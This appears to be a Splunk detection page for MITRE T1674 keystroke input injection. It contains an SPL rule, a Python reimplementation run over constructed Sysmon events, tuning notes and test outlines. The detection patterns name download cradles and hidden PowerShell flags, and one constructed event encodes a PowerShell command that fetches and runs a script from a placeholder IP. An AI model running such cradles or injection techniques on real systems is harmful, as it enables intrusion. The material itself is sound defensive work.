T1674 Splunk · SPL

Detect Input Injection in Splunk

This detection identifies adversary attempts to simulate keyboard input in order to execute commands or manipulate applications on behalf of a victim. Input injection takes three forms: HID (Human Interface Device) emulation by a malicious USB device such as a Rubber Ducky, programmatic keystroke injection through Win32 APIs (SendInput, keybd_event, or PostMessage with WM_KEYDOWN/WM_KEYUP), and code that watches the Windows message loop and injects input into one specific application such as a browser. Sysmon never records the keystrokes themselves, so the indicators are their side effects: PowerShell or other command interpreters spawned by the interactive desktop shell (explorer.exe) with encoded or hidden-window command lines and no matching user action, bursts of automated activity shortly after a USB device is attached, and shells spawned directly by browser processes. The browser pattern is associated with banking trojans such as BackSwap, which watches for financial URLs and injects JavaScript into the browser via simulated keystrokes.

MITRE ATT&CK

Tactic
Execution
Technique
T1674 Input Injection
Canonical reference
https://attack.mitre.org/techniques/T1674/

SPL Detection Query

Splunk (SPL)
index=* sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval ParentImage=lower(ParentImage), Image=lower(Image), CommandLine=lower(CommandLine)
| where (match(ParentImage, "(explorer\.exe|winlogon\.exe|userinit\.exe|sihost\.exe|taskhostw\.exe)$")
    AND match(Image, "(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe)$")
    AND match(CommandLine, "(-encodedcommand|-enc |-e |\biex\b|invoke-expression|downloadstring|downloadfile|frombase64string|-windowstyle hidden|-noprofile|-noninteractive)"))
    OR (match(ParentImage, "(chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$")
    AND match(Image, "(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe)$"))
| eval InjectionType=case(
    match(ParentImage, "(chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$"), "BrowserInputInjection",
    match(ParentImage, "(explorer\.exe|winlogon\.exe|userinit\.exe|sihost\.exe|taskhostw\.exe)$"), "HIDKeystrokeInjection",
    true(), "Unknown")
| table _time, host, User, InjectionType, ParentImage, ParentProcessId, Image, ProcessId, CommandLine, Hashes
| sort -_time
Severity: high · Confidence: medium

Sysmon Event ID 1 (Process Create) detection for the observable side effects of input injection. The first leg flags shells and LOLBins (PowerShell, cmd.exe, wscript/cscript, mshta, rundll32, regsvr32, certutil) whose parent is an interactive desktop process (explorer.exe, winlogon.exe, userinit.exe, sihost.exe, taskhostw.exe) and whose command line carries encoded, download-cradle or hidden-window arguments, the shape of a Rubber Ducky or Win+R keystroke payload. The `iex` token is word-bounded so that a command line that merely mentions iexplore.exe does not match. The second leg flags a command shell spawned directly by a browser process, which is not normal browser behaviour. Two caveats: BackSwap-style console injection runs JavaScript inside the browser and creates no child process, so the browser leg catches follow-on execution rather than the injection itself; and the injecting tool (a USB device, an AutoHotkey script) never appears in the process lineage, because the launched process belongs to whichever application received the keystrokes. The rule relies on Sysmon's process-creation telemetry: parent process tracking and command-line logging.
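As an added example, not the page's own code or part of the detection package, the same logic reimplemented in Python and run over constructed Sysmon Event ID 1 records in the XmlWinEventLog layout that the sourcetype above ingests. It mirrors the where() and case() clauses, word-bounds the iex token so that a command line mentioning iexplore.exe does not trip the desktop-shell leg, and shows which of the sample events the rule surfaces and which it ignores. The hostnames, user names, encoded command and the 203.0.113.10 address are all constructed for the example.

```python
"""Reference implementation of the T1674 SPL rule over constructed Sysmon XML.

Added example; the sample events below are constructed, not captured.
"""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Same patterns as the SPL where() clause; inputs are lowercased before matching.
DESKTOP_PARENT = re.compile(r"(explorer\.exe|winlogon\.exe|userinit\.exe|sihost\.exe|taskhostw\.exe)$")
BROWSER_PARENT = re.compile(r"(chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$")
SHELL_IMAGE = re.compile(r"(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|"
                         r"rundll32\.exe|regsvr32\.exe|certutil\.exe)$")
BROWSER_CHILD = re.compile(r"(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe)$")
# 'iex' is word-bounded so that 'iexplore' in a command line does not match.
SUSPICIOUS_ARGS = re.compile(r"(-encodedcommand|-enc |-e |\biex\b|invoke-expression|downloadstring|"
                             r"downloadfile|frombase64string|-windowstyle hidden|-noprofile|-noninteractive)")


def make_sysmon_event(event_id, computer, fields):
    """Build one XmlWinEventLog-style Sysmon record (constructed sample)."""
    data = "".join(f"<Data Name='{k}'>{escape(v)}</Data>" for k, v in fields.items())
    return (f"<Event xmlns='{NS['e']}'>"
            f"<System><Provider Name='Microsoft-Windows-Sysmon'/><EventID>{event_id}</EventID>"
            f"<Computer>{computer}</Computer></System>"
            f"<EventData>{data}</EventData></Event>")


def parse_event(xml_text):
    """Return (computer, {Data Name: value}) for Event ID 1 records, else None (EventCode=1 filter)."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "1":
        return None
    computer = root.findtext("e:System/e:Computer", namespaces=NS)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return computer, data


def classify(ev):
    """Mirror of the SPL where() + case(): InjectionType label, or None when the rule would not fire."""
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    if BROWSER_PARENT.search(parent) and BROWSER_CHILD.search(image):
        return "BrowserInputInjection"
    if DESKTOP_PARENT.search(parent) and SHELL_IMAGE.search(image) and SUSPICIOUS_ARGS.search(cmd):
        return "HIDKeystrokeInjection"
    return None


def detect(xml_records):
    """Run the rule over raw XML records and return rows shaped like the SPL table."""
    rows = []
    for rec in xml_records:
        parsed = parse_event(rec)
        if parsed is None:
            continue
        host, ev = parsed
        label = classify(ev)
        if label:
            rows.append({"host": host, "User": ev.get("User"), "InjectionType": label,
                         "ParentImage": ev.get("ParentImage"), "Image": ev.get("Image"),
                         "CommandLine": ev.get("CommandLine")})
    return rows


# Constructed sample events (documentation IP range, fictitious hosts and users).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# -EncodedCommand payloads are UTF-16LE before base64; build one the way PowerShell expects it.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')".encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    # Hidden, encoded PowerShell from the desktop shell: the Rubber Ducky / Win+R shape.
    make_sysmon_event(1, "WS01", {"Image": PS, "User": r"CORP\alice", "ParentImage": EXPLORER,
                                  "CommandLine": f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENC}"}),
    # A user opening a console from the Start menu: same parent, no flagged arguments, no alert.
    make_sysmon_event(1, "WS01", {"Image": PS, "User": r"CORP\alice", "ParentImage": EXPLORER,
                                  "CommandLine": "powershell.exe"}),
    # cmd.exe as a direct child of chrome.exe: never normal browser behaviour.
    make_sysmon_event(1, "WS02", {"Image": CMD, "User": r"CORP\bob", "ParentImage": CHROME,
                                  "CommandLine": "cmd.exe /c whoami"}),
    # 'iexplore' in a command line must not match the word-bounded 'iex' token.
    make_sysmon_event(1, "WS01", {"Image": CMD, "User": r"CORP\alice", "ParentImage": EXPLORER,
                                  "CommandLine": "cmd.exe /c start iexplore.exe https://intranet.corp.example"}),
    # Event ID 3 (network connection) is dropped by the EventCode=1 filter.
    make_sysmon_event(3, "WS01", {"Image": PS, "DestinationIp": "203.0.113.10"}),
]

if __name__ == "__main__":
    for row in detect(SAMPLE_EVENTS):
        print(row["host"], row["InjectionType"], row["ParentImage"], "->", row["CommandLine"][:60])
```

Running the block prints two rows, the encoded PowerShell from explorer.exe on WS01 and the cmd.exe child of chrome.exe on WS02; the interactive console launch, the iexplore.exe command line and the network event are all left alone.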

Data Sources

Sysmon

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Desktop automation scripts using AutoHotkey, AutoIt or similar tools that legitimately simulate keystrokes and launch processes
  • Enterprise software deployment tools that spawn processes in the user's context through explorer.exe shell execution
  • Accessibility software and voice-to-text tools that use keystroke simulation to drive desktop applications
  • Browser-integrated development tools or IDE browser plugins that open terminal windows for developer workflows
  • Legitimate RPA (Robotic Process Automation) software during normal business process automation
  • explorer.exe is the parent of almost every process a user launches interactively, so the desktop-shell leg is only as good as its command-line filter; the `-e ` and `-noninteractive` tokens in particular will match scripted PowerShell from sihost.exe and taskhostw.exe. To tie an alert to an actual USB attachment, correlate with a device-arrival event on the same host shortly before the spawn (Security Event ID 6416, "A new external device was recognized by the system", when Audit PnP Activity is enabled)
  • Replace index=* with the index that actually holds Sysmon data; scanning every index is slow and can surface duplicate copies of the same event

Testing Methodology

Validate this detection against four adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see in the Sysmon sourcetype above. Keep in mind that the rule fires on the spawned process, not on the keystrokes: a test produces an alert only when the resulting shell has one of the listed parents and, for the desktop-shell leg, one of the listed command-line arguments.

  1. Test 1: PowerShell Keystroke Injection via SendKeys COM Object

    Expected signal: Sysmon Event ID 1: powershell.exe process creation with '-Command' and 'SendKeys' in CommandLine; subsequent notepad.exe process creation with powershell.exe as ParentImage. Neither event matches this rule on its own unless the PowerShell launch line carries a flagged argument such as -NoProfile or -WindowStyle Hidden.

  2. Test 2: Simulated HID USB Attack - AutoHotkey Keystroke Script

    Expected signal: Sysmon Event ID 1: AutoHotkey.exe process creation, followed by powershell.exe process creation with explorer.exe as ParentImage, because the Run dialog opened by the simulated Win+R belongs to the shell. AutoHotkey.exe does not appear in the lineage of the injected process, which is exactly why the rule keys on explorer.exe plus a suspicious command line rather than on the injector.

  3. Test 3: Browser Console JavaScript Injection via Clipboard and Simulated Keystrokes (BackSwap Simulation)

    Expected signal: Sysmon Event ID 1: powershell.exe with SendKeys and AppActivate in CommandLine; Sysmon Event ID 24 (ClipboardChange) for the clipboard write if that event type is enabled in the Sysmon configuration. The F12 keystroke and the console activity inside the browser generate no Sysmon event, so this test validates telemetry for the injecting PowerShell process; it does not exercise the browser leg of the rule, which needs a shell spawned as a child of the browser.

  4. Test 4: USB Rubber Ducky Payload Simulation - Direct Win32 API Keystroke Injection

    Expected signal: Sysmon Event ID 1: powershell.exe with Add-Type and SendInput/DllImport in the command line or script content; on Windows PowerShell 5.1, Add-Type compiles the P/Invoke stub with csc.exe, so also expect a csc.exe child of powershell.exe; Sysmon Event ID 7 (ImageLoad) for user32.dll loading into the PowerShell process if image-load logging is configured; Security Event ID 4688 if process-creation auditing is enabled.
